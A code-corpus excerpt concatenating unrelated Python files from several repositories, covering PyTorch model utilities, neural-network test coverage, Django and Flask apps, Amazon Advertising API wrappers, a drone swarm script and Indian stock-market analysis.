FLOPs:注意s小写,是floating point operations的缩写(s表复数),意指浮点运算数,理解为计算量。可以用来衡量算法/模型的复杂度。
https://www.zhihu.com/question/65305385
'''
stride = 64
img = torch.zeros((1, 3, stride, stride), device=next(model.parameters()).device)
flops, params = profile(deepcopy(model), inputs=(img,), verbose=False)
params /= 1e6
flops /= 1e9
flops *= tsize[0] * tsize[1] / stride / stride * 2 # Gflops
info = "Params: {:.2f}M, Gflops: {:.2f}".format(params, flops)
return info
def fuse_conv_and_bn(conv: nn.Conv2d, bn: nn.BatchNorm2d) -> nn.Conv2d:
"""
Fuse convolution and batchnorm layers.
check more info on https://tehnokv.com/posts/fusing-batchnorm-and-conv/
Args:
conv (nn.Conv2d): convolution to fuse.
bn (nn.BatchNorm2d): batchnorm to fuse.
Returns:
nn.Conv2d: fused convolution behaves the same as the input conv and bn.
"""
fusedconv = (
nn.Conv2d(
conv.in_channels,
conv.out_channels,
kernel_size=conv.kernel_size,
stride=conv.stride,
padding=conv.padding,
groups=conv.groups,
bias=True,
)
.requires_grad_(False)
.to(conv.weight.device)
)
# prepare filters
w_conv = conv.weight.clone().view(conv.out_channels, -1)
w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))
fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
# prepare spatial bias
b_conv = (
torch.zeros(conv.weight.size(0), device=conv.weight.device)
if conv.bias is None
else conv.bias
)
b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(
torch.sqrt(bn.running_var + bn.eps)
)
fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
return fusedconv
def fuse_model(model: nn.Module) -> nn.Module:
"""fuse conv and bn in model
Args:
model (nn.Module): model to fuse
Returns:
nn.Module: fused model
"""
from yolox.models.network_blocks import BaseConv
for m in model.modules():
if type(m) is BaseConv and hasattr(m, "bn"):
m.conv = fuse_conv_and_bn(m.conv, m.bn) # update conv
delattr(m, "bn") # remove batchnorm
m.forward = m.fuseforward # update forward
return model
def replace_module(module, replaced_module_type, new_module_type, replace_func=None) -> nn.Module:
"""
Replace given type in module to a new type. mostly used in deploy.
Args:
module (nn.Module): model to apply replace operation.
replaced_module_type (Type): module type to be replaced.
new_module_type (Type)
replace_func (function): python function to describe replace logic. Defalut value None.
Returns:
model (nn.Module): module that already been replaced.
"""
def default_replace_func(replaced_module_type, new_module_type):
return new_module_type()
if replace_func is None:
replace_func = default_replace_func
model = module
if isinstance(module, replaced_module_type):
model = replace_func(replaced_module_type, new_module_type)
else: # recurrsively replace
for name, child in module.named_children():
new_child = replace_module(child, replaced_module_type, new_module_type)
if new_child is not child: # child is already replaced
model.add_module(name, new_child) # 因为name相同,所以相当于直接把child换成new_child
return model
def freeze_module(module: nn.Module, name=None) -> nn.Module:
"""freeze module inplace
Args:
module (nn.Module): module to freeze.
name (str, optional): name to freeze. If not given, freeze the whole module.
Note that fuzzy match is not supported. Defaults to None.
Examples:
freeze the backbone of model
>>> freeze_moudle(model.backbone)
or freeze the backbone of model by name
>>> freeze_moudle(model, name="backbone")
"""
for param_name, parameter in module.named_parameters():
if name is None or name in param_name:
parameter.requires_grad = False
# ensure module like BN and dropout are freezed
for module_name, sub_module in module.named_modules():
# actually there are no needs to call eval for every single sub_module
if name is None or name in module_name:
sub_module.eval()
return module
@contextlib.contextmanager
def adjust_status(module: nn.Module, training: bool = False) -> nn.Module:
"""Adjust module to training/eval mode temporarily.
Args:
module (nn.Module): module to adjust status.
training (bool): training mode to set. True for train mode, False fro eval mode.
Examples:
>>> with adjust_status(model, training=False):
... model(data)
"""
status = {}
def backup_status(module):
for m in module.modules():
# save prev status to dict
status[m] = m.training
m.training = training
def recover_status(module):
for m in module.modules():
# recover prev status from dict
m.training = status.pop(m)
backup_status(module)
yield module
recover_status(module)
``` |
{
"source": "853108389/DeepConcolic",
"score": 2
} |
#### File: DeepConcolic/src/nc_l0.py
```python
from numpy import linalg as LA
import time
import os
import sys
import numpy as np
from utils import *
from l0_encoding import *
def l0_negate(dnn, layer_functions, test, nc_layer, pos):
idx_min = 0
idx_max = 10
gran = 2
mani_range = 100
adv = 0
(row, col, chl) = test[0].shape
tic=time.time()
sorted_pixels=sort_pixels(dnn, layer_functions, test[0], nc_layer, pos, gran)
(act_images, idx_first, success_flag) = accumulate(dnn, layer_functions, test[0], nc_layer, pos, sorted_pixels, mani_range)
elapsed=time.time()-tic
#print ('\n == Elapsed time: ', elapsed)
result=[]
if success_flag:
act_image_first=act_images[0]
refined_act_image=refine_act_image(dnn, layer_functions, test[0], nc_layer, pos, sorted_pixels, act_image_first, idx_first)
image_diff = np.abs(refined_act_image - test[0])
L0_distance = (image_diff * 255 > 1).sum()
L1_distance = image_diff.sum()
L2_distance = LA.norm(image_diff)
return True, L0_distance, refined_act_image
return False, None, None
```
#### File: DeepConcolic/src/nc_setup.py
```python
from datetime import datetime
import os
import keras
from keras.models import *
from keras.datasets import cifar10
from keras.datasets import mnist
from keras.applications.vgg16 import VGG16
from keras.preprocessing.image import load_img
from keras.layers import *
from keras import *
from utils import *
from nc_lp import *
from lp_encoding import *
def nc_setup(test_object, outs):
print('\n== {0}, {1} ==\n'.format(test_object.criterion, test_object.norm))
if not os.path.exists(outs):
os.system('mkdir -p {0}'.format(outs))
if not outs.endswith('/'):
outs+='/'
nc_results=outs+'nc_{0}_report-{1}.txt'.format(test_object.norm, str(datetime.now()).replace(' ', '-'))
nc_results=nc_results.replace(':', '-')
layer_functions=get_layer_functions(test_object.dnn)
print('\n== Got layer functions: {0} ==\n'.format(len(layer_functions)))
cover_layers=get_cover_layers(test_object.dnn, 'NC')
print('\n== Got cover layers: {0} ==\n'.format(len(cover_layers)))
tot_size=len(test_object.raw_data.data)
activations=None
batches=np.array_split(test_object.raw_data.data[0:tot_size], tot_size//1000 + 1)
for i in range(0, len(batches)):
batch=batches[i]
sub_acts=eval_batch(layer_functions, batch, is_input_layer(test_object.dnn.layers[0]))
if i==0:
activations=sub_acts
else:
for j in range(0, len(activations)):
activations[j]=np.concatenate((activations[j], sub_acts[j]), axis=0)
calculate_pfactors(activations, cover_layers)
#### configuration phase done
test_cases=[]
adversarials=[]
xdata=test_object.raw_data.data
iseed=np.random.randint(0, len(xdata))
im=xdata[iseed]
test_cases.append(im)
update_nc_map_via_inst(cover_layers, eval(layer_functions, im, is_input_layer(test_object.dnn.layers[0])), (test_object.layer_indices, test_object.feature_indices))
covered, not_covered=nc_report(cover_layers, test_object.layer_indices, test_object.feature_indices)
print('\n== The initial neuron coverage: {0}==\n'.format(covered*1.0/(covered+not_covered)))
save_an_image(im/test_object.inp_ub*1.0, 'seed-image', outs)
f = open(nc_results, "a")
f.write('NC-cover: {0} #test cases: {1} #adversarial examples: {2}\n'.format(1.0 * covered / (covered + not_covered), len(test_cases), len(adversarials)))
f.close()
#for i in range(0, len(cover_layers)):
# cover_layers[i].initialize_ssc_map((test_object.layer_indices, test_object.feature_indices))
return nc_results, layer_functions, cover_layers, activations, test_cases, adversarials
def ssc_setup(test_object, outs):
print('\n== MC/DC (ssc) coverage for neural networks ==\n')
if not os.path.exists(outs):
os.system('mkdir -p {0}'.format(outs))
if not outs.endswith('/'):
outs+='/'
nc_results=outs+'ssc_report-{0}.txt'.format(str(datetime.now()).replace(' ', '-'))
nc_results=nc_results.replace(':', '-')
layer_functions=get_layer_functions(test_object.dnn)
print('\n== Total layers: {0} ==\n'.format(len(layer_functions)))
cover_layers=get_cover_layers(test_object.dnn, 'SSC')
print('\n== Cover-able layers: {0} ==\n'.format(len(cover_layers)))
for i in range(0, len(cover_layers)):
cover_layers[i].initialize_ubs()
cover_layers[i].initialize_ssc_map((test_object.layer_indices, test_object.feature_indices))
#print ("to compute the ubs")
activations=None
if not test_object.training_data is None:
for x in test_object.training_data:
x_acts=eval_batch(layer_functions, np.array([x]), is_input_layer(test_object.dnn.layers[0]))
for i in range(1, len(cover_layers)):
#print (type(x_acts[cover_layers[i].layer_index][0]))
#print (type(cover_layers[i].ubs))
cover_layers[i].ubs=np.maximum(cover_layers[i].ubs, x_acts[cover_layers[i].layer_index][0])
#print ("done")
# tot_size=len(test_object.training_data)
# batches=np.array_split(test_object.training_data[0:tot_size], tot_size//10 + 1)
# for i in range(0, len(batches)):
# batch=batches[i]
# sub_acts=eval_batch(layer_functions, batch, is_input_layer(test_object.dnn.layers[0]))
# if i==0:
# activations=sub_acts
# else:
# for j in range(0, len(activations)):
# activations[j]=np.concatenate((activations[j], sub_acts[j]), axis=0)
return nc_results, layer_functions, cover_layers, activations
``` |
{
"source": "853695319/rest_framework_tutorial",
"score": 3
} |
#### File: rest_framework_tutorial/snippets/views.py
```python
from django.contrib.auth.models import User
from rest_framework import permissions, renderers, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from .models import Snippet
from .permissions import IsOwnerOrReadOnly
from .serializers import SnippetModelSerializer, UserModelSerializer
class SnippetViewSet(viewsets.ModelViewSet):
"""此视图自动提供`list`, `create`, `retrieve`, `update`和`destroy`操作
另外我们还提供了一个额外的`highlight`操作"""
queryset = Snippet.objects.all()
serializer_class = SnippetModelSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
# 使用`@action`装饰器创建一个名为`highlight`的自定义*操作*
# 这个装饰器可用于条件不符合标准`create`/`update`/`delete`样式的任何自定义路径
# 默认情况小,使用`@action`装饰器的自定义操作将响应`GET`请求。
# 如果我们想要一个响应`POST`请求的动作,我们可以使用`method`参数
# 默认情况下,自定义操作的URL取决于方法名称本身。
# 如果要更改URL的构造方式,可以为装饰器设置url_path关键字参数
@action(detail=True, renderer_classes=[renderers.StaticHTMLRenderer])
def highlight(self, request, *args, **kwargs):
snippet = self.get_object()
return Response(snippet.highlighted)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""只读 此视图自动提供`list`和`detail`操作"""
queryset = User.objects.all()
serializer_class = UserModelSerializer
``` |
{
"source": "854350999/python-amazon-ad-api",
"score": 2
} |
#### File: ad_api/sp_brands/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_recommendations_targets(self, params):
self.uri_path = "/sb/recommendations/targets/product/list"
self.method = "post"
self.data = params
return self.execute()
def get_recommendations_targets_category(self, params):
self.uri_path = "/sb/recommendations/targets/category"
self.method = "post"
self.data = params
return self.execute()
def get_recommendations_targets_brand(self, params):
self.uri_path = "/sb/recommendations/targets/brand"
self.method = "post"
self.data = params
return self.execute()
```
#### File: ad_api/sp_display/adgroups.py
```python
from ..client import Client
class AdGroups(Client):
def get_ad_groups(self, params):
self.method = "get"
self.uri_path = "/sd/adGroups"
self.data = params
return self.execute()
def update_ad_groups(self, params):
self.uri_path = "/sd/adGroups"
self.method = "put"
self.data = params
return self.execute()
def create_ad_groups(self, params):
self.uri_path = "/sd/adGroups"
self.method = "post"
self.data = params
return self.execute()
def get_ad_group_by_id(self, ad_group_id):
self.method = "get"
self.uri_path = "/sd/adGroups/{}".format(ad_group_id)
return self.execute()
def delete_ad_group_by_id(self, ad_group_id):
self.uri_path = "/sd/adGroups/{}".format(ad_group_id)
self.method = "delete"
return self.execute()
def get_ad_group_extended(self, params):
self.method = "get"
self.uri_path = "/sd/adGroups/extended"
self.data = params
return self.execute()
def get_ad_group_extended_by_id(self, ad_group_id):
self.method = "get"
self.uri_path = "/sd/adGroups/extended/{}".format(ad_group_id)
return self.execute()
```
#### File: ad_api/sp_display/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_targets_recommendations(self, params):
self.uri_path = "/sd/targets/recommendations"
self.method = "post"
self.data = params
return self.execute()
```
#### File: ad_api/sp_products/cam_neg_keywords.py
```python
from ..client import Client
class CampNegKeywords(Client):
def get_camp_neg_keywords_by_id(self, keyword_id):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/{}".format(keyword_id)
return self.execute()
def delete_camp_neg_keywords_by_id(self, keyword_id):
self.uri_path = "/v2/sp/campaignNegativeKeywords/{}".format(keyword_id)
self.method = "delete"
return self.execute()
def get_camp_neg_keywords_extended_by_id(self, keyword_id):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/extended/{}".format(keyword_id)
return self.execute()
def get_camp_neg_keywords_extended(self, params):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords/extended"
self.data = params
return self.execute()
def get_camp_neg_keywords(self, params):
self.method = "get"
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
return self.execute()
def create_camp_neg_keywords(self, params):
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
self.method = "post"
return self.execute()
def update_camp_neg_keywords(self, params):
self.uri_path = "/v2/sp/campaignNegativeKeywords"
self.data = params
self.method = "put"
return self.execute()
```
#### File: ad_api/sp_products/neg_targeting.py
```python
from ..client import Client
class NegProductTargets(Client):
def create_neg_targets(self, params):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "post"
self.data = params
return self.execute()
def update_neg_targets(self, params):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "put"
self.data = params
return self.execute()
def get_neg_targets(self, params):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets"
self.data = params
return self.execute()
def get_neg_targets_by_id(self, target_id):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
return self.execute()
def delete_neg_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "delete"
return self.execute()
def get_neg_targets_extended(self, params):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/extended"
self.data = params
return self.execute()
def get_neg_targets_extended_by_id(self, target_id):
self.method = "get"
self.uri_path = "/v2/sp/negativeTargets/extended/{}".format(target_id)
return self.execute()
``` |
{
"source": "854350999/python-amazon-advertising-api",
"score": 2
} |
#### File: ad_api/common/product_metadata.py
```python
from ..client import Client
class ProductMetadata(Client):
def get_product_metadata(self, data):
self.uri_path = "/product/metadata"
self.method = "post"
self.data = data
return self.execute()
```
#### File: ad_api/sp_brands/drafts.py
```python
from ..client import Client
class Drafts(Client):
def get_drafts_campaign(self, start_index: int = 0, count: int = None, name: str = None,
draft_campaign_id_filter: str = None, portfolio_id_filter: str = None,
ad_format_filter: str = None):
self.method = "get"
self.uri_path = "/sb/drafts/campaigns"
self.params = {
"startIndex": start_index,
"count": count,
"name": name,
"draftCampaignIdFilter": draft_campaign_id_filter,
"portfolioIdFilter": portfolio_id_filter,
"adFormatFilter": ad_format_filter
}
return self.execute()
def create_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns"
self.method = "post"
self.data = data
return self.execute()
def update_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns"
self.method = "put"
self.data = data
return self.execute()
def get_drafts_campaign_by_id(self, draft_campaign_id):
self.method = "get"
self.uri_path = "/sb/drafts/campaigns/{}".format(draft_campaign_id)
return self.execute()
def delete_drafts_campaign_by_id(self, draft_campaign_id):
self.uri_path = "/sb/drafts/campaigns/{}".format(draft_campaign_id)
self.method = "delete"
return self.execute()
def submit_drafts_campaign(self, data):
self.uri_path = "/sb/drafts/campaigns/submit"
self.method = "post"
self.data = data
return self.execute()
```
#### File: ad_api/sp_brands/media.py
```python
from ..client import Client
class Media(Client):
def create_media_upload(self, program_type: str = "SponsoredBrands", creative_type: str = "Video"):
self.uri_path = "/media/upload"
self.method = "post"
self.data = {
"programType": program_type,
"creativeType": creative_type
}
return self.execute()
def update_media_upload(self, upload_location: str, version: str = None):
self.uri_path = "/media/complete"
self.method = "put"
self.data = {
"uploadLocation": upload_location,
"version": version
}
return self.execute()
def get_media_describe(self, media_id):
self.method = "get"
self.uri_path = "/media/describe"
self.headers["mediaId"] = media_id
return self.execute()
```
#### File: ad_api/sp_brands/targeting_recommendations.py
```python
from ..client import Client
class TargetingRecommendations(Client):
def get_recommendations_targets(self, next_token: str = None, max_results: int = None, filters: list = None):
self.uri_path = "/sb/recommendations/targets/product/list"
self.method = "post"
self.data = {
"nextToken": next_token,
"maxResults": max_results,
"filters": filters
}
return self.execute()
def get_recommendations_targets_category(self, asins):
self.uri_path = "/sb/recommendations/targets/category"
self.method = "post"
self.data = {
"asins": asins
}
return self.execute()
def get_recommendations_targets_brand(self, category_id: int = None, keyword: str = None):
self.uri_path = "/sb/recommendations/targets/brand"
self.method = "post"
self.data = {
"categoryId": category_id,
"keyword": keyword
}
return self.execute()
```
#### File: ad_api/sp_display/reports.py
```python
from ..client import Client
class Reports(Client):
def request_report(self, record_type, data):
self.uri_path = "/sd/{}/report".format(record_type)
self.method = "post"
self.data = data
return self.execute()
def get_report(self, report_id):
self.uri_path = "/v2/reports/{}".format(report_id)
self.method = "get"
return self.execute()
def get_report_download_url(self, location):
self.method = "get"
return self.execute_download(location)
def get_report_download(self, report_id):
self.uri_path = "/v2/reports/{}/download".format(report_id)
self.method = "get"
self.headers.pop("Content-Type")
self.headers["Accept-encoding"] = "gzip"
return self.execute()
```
#### File: ad_api/sp_products/negative_product_targeting.py
```python
from ..client import Client
class NegativeProductTargeting(Client):
def create_negative_targets(self, data):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "post"
self.data = data
return self.execute()
def update_negative_targets(self, data):
self.uri_path = "/v2/sp/negativeTargets"
self.method = "put"
self.data = data
return self.execute()
def get_negative_targets(self, start_index: int = 0, count: int = None, state_filter: str = None,
campaign_id_filter: str = None, ad_group_id_filter: str = None,
target_id_filter: str = None):
self.uri_path = "/v2/sp/negativeTargets"
self.params = {
"startIndex": start_index,
"count": count,
"stateFilter": state_filter,
"campaignIdFilter": campaign_id_filter,
"adGroupIdFilter": ad_group_id_filter,
"targetIdFilter": target_id_filter
}
self.method = "get"
return self.execute()
def get_negative_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "get"
return self.execute()
def delete_negative_targets_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/{}".format(target_id)
self.method = "delete"
return self.execute()
def get_negative_targets_extended(self, start_index: int = 0, count: int = None, state_filter: str = None,
campaign_id_filter: str = None, ad_group_id_filter: str = None,
target_id_filter: str = None):
self.uri_path = "/v2/sp/negativeTargets/extended"
self.method = "get"
self.params = {
"startIndex": start_index,
"count": count,
"stateFilter": state_filter,
"campaignIdFilter": campaign_id_filter,
"adGroupIdFilter": ad_group_id_filter,
"targetIdFilter": target_id_filter
}
return self.execute()
def get_negative_targets_extended_by_id(self, target_id):
self.uri_path = "/v2/sp/negativeTargets/extended/{}".format(target_id)
self.method = "get"
return self.execute()
``` |
{
"source": "854768750/crazyflie_ros",
"score": 3
} |
#### File: scripts/swarm/swarm.py
```python
import csv
import rospy
import math
import tf
import numpy as np
import time
from tf import TransformListener
from geometry_msgs.msg import PoseStamped
class Swarm():
def __init__(self):
rospy.init_node('demo', anonymous=True)
self.worldFrame = rospy.get_param("~worldFrame", "/world")
self.frame = rospy.get_param("~frame")
self.pubGoal = rospy.Publisher('goal', PoseStamped, queue_size=1)
self.listener = TransformListener()
self.goals = goals
self.goalIndex = 1
self.index = 1
with open('test.csv','rb') as myfile:
reader=csv.reader(myfile)
lines = [line for line in reader]
def run(self):
self.listener.waitForTransform(self.worldFrame, self.frame, rospy.Time(), rospy.Duration(5.0))
goal = PoseStamped()
goal.header.seq = 0
goal.header.frame_id = self.worldFrame
while not rospy.is_shutdown():
goal.header.seq += 1
goal.header.stamp = rospy.Time.now()
goal.pose.position.x = int(lines[self.goalIndex][3*index-1])
goal.pose.position.y = int(lines[self.goalIndex][3*index+0])
goal.pose.position.z = int(lines[self.goalIndex][3*index+1])
quaternion = tf.transformations.quaternion_from_euler(0, 0, 0)
goal.pose.orientation.x = 0
goal.pose.orientation.y = 0
goal.pose.orientation.z = 0
goal.pose.orientation.w = 1
self.pubGoal.publish(goal)
t = self.listener.getLatestCommonTime(self.worldFrame, self.frame)
if self.listener.canTransform(self.worldFrame, self.frame, t):
position, quaternion = self.listener.lookupTransform(self.worldFrame, self.frame, t)
rpy = tf.transformations.euler_from_quaternion(quaternion)
if math.fabs(position[0] - int(lines[self.goalIndex][3*index-1])) < 0.25 \
and math.fabs(position[1] - int(lines[self.goalIndex][3*index+0])) < 0.25 \
and math.fabs(position[2] - int(lines[self.goalIndex][3*index+1])) < 0.25 \
and self.goalIndex < len(lines):
rospy.sleep(lines[self.goalIndex][1])
self.goalIndex += 1
if __name__ == '__main__':
demo = Swarm()
demo.run()
``` |
{
"source": "85599/my-first-contact-app",
"score": 2
} |
#### File: my-first-contact-app/contact/models.py
```python
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
from django.utils import timezone
class Person(models.Model):
first_name = models.CharField(max_length=20)
last_name = models.CharField(max_length=20)
email = models.EmailField(max_length=250)
phone = PhoneNumberField()
def publish(self):
self.published_date = timezone.now()
self.save()
def full_name(self):
return '{} {}'.format(self.first_name, self.last_name)
def __str__(self):
return self.full_name()
``` |
{
"source": "85599/Niftytechnical-analysis",
"score": 3
} |
#### File: 85599/Niftytechnical-analysis/analysis.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from nsepy import get_history
from datetime import datetime as dt
plt.style.use("seaborn")
start_date = dt(2000,1,1)
end_date = dt.now()
# df = get_history("Nifty",start_date,end_date,index=True)
# print(df.tail())
# df.to_csv("Nifty50.csv")
def eichermot():
df = pd.read_csv("./data/EICHERMOT.csv",parse_dates=True,index_col=0)
df = df.resample('W').mean()
# print(df.head())
fig = plt.figure(figsize=(12,6))
plt.plot(df.index,df['Close'])
plt.xlabel("Year")
plt.ylabel("Price")
plt.title("Eichermotors stock price over the years")
# plt.show()
#Calculate a 50 day moving average
df['50ma'] = df['Close'].rolling(window=50).mean()
print(df.tail())
fig = plt.figure(figsize=(12,6))
ax1 = plt.subplot2grid((6,1),(0,0),rowspan=5,colspan=1)
ax2 = plt.subplot2grid((6,1),(5,0),rowspan=1,colspan=1,sharex=ax1)
ax1.plot(df.index,df['Close'])
ax1.plot(df.index,df['50ma'])
ax2.plot(df.index,df['Volume'])
plt.show()
df = pd.read_csv("./Nifty50_combined.csv",parse_dates=True,index_col=0)
df = df["2010-01-01":"2019-12-31"]
print(df.head())
def get_insights():
print("Summary Statistics of 50 stocks:")
print(df.describe().T)
#Plot average price of stocks
summary = df.describe().T
fig = plt.figure(figsize=(8,12))
plt.barh(summary.index,summary['mean'])
plt.title("Average price of Stocks")
plt.ylabel("Stocks")
plt.xlabel("Average price")
# plt.show()
#calculate simple returns or percentage returns of the stocks
fig2 = plt.figure()
df.pct_change().mean().plot(figsize=(10,6),kind='bar')
plt.xlabel("Stocks")
plt.ylabel("Percentage Change")
plt.title("Simple returns")
# plt.show()
#calculate and plot the log returns
rets = np.log(df/df.shift(1))
rets[rets.columns[30:45]].cumsum().apply(np.exp).plot(figsize=(10,6))
plt.title("Log returns")
# plt.show()
# select some well performing stocks overtime
print(df.columns)
stocks = df[['SHREECEM','BAJAJFINSV','EICHERMOT','INDUSINDBK','HINDUNILVR']]
ax = stocks.plot(figsize=(10,8),subplots=True,title="Well performing stocks over the past years")
ax[2].set_ylabel("Stock Price")
# plt.show()
#Simple moving average stratergy
#Rolling statistics
tick = "SHREECEM"
EM = df[:][tick].reset_index()
EM.set_index('Date',inplace=True)
# print(EM.head())
window = 30
#calculate mean,median,max,std_dev for the selected stock data
EM['min'] = EM[tick].rolling(window=window).min()
EM['max'] = EM[tick].rolling(window=window).max()
EM['mean'] = EM[tick].rolling(window=window).mean()
EM['std'] = EM[tick].rolling(window=window).std()
EM['median'] = EM[tick].rolling(window=window).median()
ax = EM[['min','mean','max']].iloc[-750:-350].plot(figsize=(10,6), style=['g--','r--','g--'], lw=0.8)
EM[tick].iloc[-750:-350].plot(ax=ax, lw=2)
plt.xlabel("Date")
plt.ylabel("Price")
plt.title("30 days max min simple moving average")
# plt.show()
# moving average cross over
EM['SMA1'] = EM[tick].rolling(window=52).mean()
EM['SMA2'] = EM[tick].rolling(window=252).mean()
EM.dropna(inplace=True)
EM['positions'] = np.where(EM['SMA1']>EM['SMA2'],1,-1)
ax = EM[[tick,'SMA1','SMA2','positions']].plot(figsize=(10,6), secondary_y='positions')
ax.get_legend().set_bbox_to_anchor((0.25, 0.85))
plt.title('SMA cross over stratergy')
plt.show()
# Correlation
def get_correlation():
df_corr = df.corr()
print(df_corr.head())
corr_data = df_corr.values
fig = plt.figure()
ax1 = fig.add_subplot(111)
heatmap1 = ax1.pcolor(corr_data, cmap=plt.cm.RdYlGn)
fig.colorbar(heatmap1)
ax1.set_xticks(np.arange(corr_data.shape[1]) + 0.5, minor=False)
ax1.set_yticks(np.arange(corr_data.shape[0]) + 0.5, minor=False)
ax1.invert_yaxis()
ax1.xaxis.tick_top()
column_labels = df_corr.columns
row_labels = df_corr.index
ax1.set_xticklabels(column_labels)
ax1.set_yticklabels(row_labels)
plt.xticks(rotation=90)
heatmap1.set_clim(-1,1)
plt.tight_layout()
plt.title("Correlation plot")
plt.show()
def correlated_stocks():
data = df[["ICICIBANK","EICHERMOT"]]
data["2021-01-01":'2021-01-25'].plot(secondary_y="EICHERMOT",figsize=(10,6))
plt.title("ICICIvsEICHER")
plt.show()
#Function call to get the summary statistics of the data and plots
get_insights()
#Function call to plot the correlation among the 50 stocks
get_correlation()
#Function call to visualize example correlated stocks
correlated_stocks()
``` |
{
"source": "85599/nse-django",
"score": 3
} |
#### File: nse-django/home/stock_model.py
```python
import os
import pandas as pd
from sklearn import linear_model
from nsetools import Nse
import pathlib
import joblib
nse = Nse()
def nse_data(stock_name):
'''input stock_name : str
output : list = output,high,low'''
data = nse.get_quote(stock_name)
current = [data['open'],data['dayHigh'],data['dayLow']]
return current
def model_check(stock_name):
'''checking if model exits or not;
input stock_name str
return true or false'''
model_path = pathlib.Path(os.getcwd()+"\\nse_data\\saved_model\\"+stock_name+'.pkl')
if model_path.exists():
return True
else:
return False
def any_stock(stock_name):
'''function to predict any stock values
stock_name == str; today_value= list,[open,high,low]
'''
try:
if model_check(stock_name) == False:
data_path = os.getcwd()+"\\home\\nse_data\\HISTORICAL_DATA\\"
df = pd.read_csv(data_path + stock_name + '_data.csv')
df.fillna(df.mean(),inplace=True)
X = df.iloc[:,[1,2,3]]
y = df.iloc[:,[4]]
reg = linear_model.LinearRegression()
reg.fit(X,y)
y_today = reg.predict([nse_data(stock_name)])
model_path_one = os.getcwd()+"\\home\\nse_data\\saved_model\\"
joblib_file = model_path_one + stock_name+ ".pkl"
joblib.dump(reg, joblib_file)
print('model creation')
return y_today[0][0]
else:
print('model loading')
model_path_one = os.getcwd()+"\\home\\nse_data\\saved_model\\"
joblib_file = model_path_one + stock_name+ ".pkl"
model = joblib.load(joblib_file)
y_today = model.predict([nse_data(stock_name)])
return y_today
except:
return (" internal error")
# try:
# print(any_stock('SBIN'))
# except IndexError:
# print('index error')
# except FileNotFoundError:
# print("no file")
``` |
{
"source": "85599/outerweather",
"score": 3
} |
#### File: 85599/outerweather/controller.py
```python
import random
from datetime import datetime
import model as m
from flask import Flask, render_template, request, redirect, session, url_for
app = Flask(__name__)
app.secret_key = 'daniel is cool'
HUMANIZE_USE_UTC = True
@app.route('/',methods=['GET'])
@app.route('/menu',methods=['GET'])
def menu():
if request.method=="GET":
return render_template('menu.html')
else:
return render_template('menu.html')
@app.route('/weather', methods=['GET','POST'])
def weather():
if request.method=="GET":
return render_template('weather.html')
elif request.method=="POST":
submitted_city = request.form['city']
check_valid_city = m.check_status_code(submitted_city)
if check_valid_city == True:
session['submitted_city'] = submitted_city
return redirect('/outfits')
else:
return redirect('/weather')
@app.route('/outfits', methods=['GET','POST'])
def outfits():
if request.method=="GET":
submitted_city = session.get('submitted_city', None)
result = m.getWeather(submitted_city)
random.seed(datetime.now())
random_num = random.randint(0, 4)
cold_footwear = ["Boots", "Hiking Boots", "Uggs", "Winter Moccasins", "Leather Shoes"]
cold_top = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat"]
cold_accessories = ["Hat", "Toque", "Mittens", "Gloves", "Scarf", "Thermal Base Layers"]
cold_bottoms = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis"]
mild_footwear = ["Running Shoes", "Dress Shoes", "Slip-On Casual Shoes", "Slides", "Heels"]
mild_top = ["T-Shirt", "Long-Sleeve Shirt", "Light Sweatshirt", "Jean Jacket", "Dress Shirt"]
mild_accessories = ["Baseball Cap", "Headband", "Parasol", "Bucket Hat", "Watch"]
mild_bottoms = ["Sweatpants", "Long Skirt", "Jeans", "Cargo Pants", "Dress Pants", "Leggings"]
hot_footwear = ["Flip-Flops", "Sandals", "Slides", "Running Shoes", "Slip-On Casual Shoes"]
hot_top = ["Tank Top", "T-Shirt", "Undershirt", "Polo", "Blouse"]
hot_accessories = ["Fan", "Water Bottle", "Sunscreen", "Parasol", "Sunglasses"]
hot_bottoms = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Trackpants", "Athletic Shorts"]
jackets = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Jean Jacket"]
t_shirt = ["T-Shirt", "Tank Top", "Undershirt", "Polo"]
long_sleeve_shirt = ["Long-Sleeve Shirt", "Light Sweatshirt", "Dress Shirt", "Blouse"]
boots = ["Boots", "Hiking Boots", "Uggs", "Leather Shoes"]
joggers = ["Running Shoes", "Slip-On Casual Shoes"]
sandals = ["Slides", "Flip-Flops", "Sandals"]
miscellanouse_shoes = ["Winter Moccasins", "Dress Shoes"]
full_length = ["Jeans", "Sweatpants", "Khakis", "Long Skirt", "Cargo Pants", "Dress Pants"]
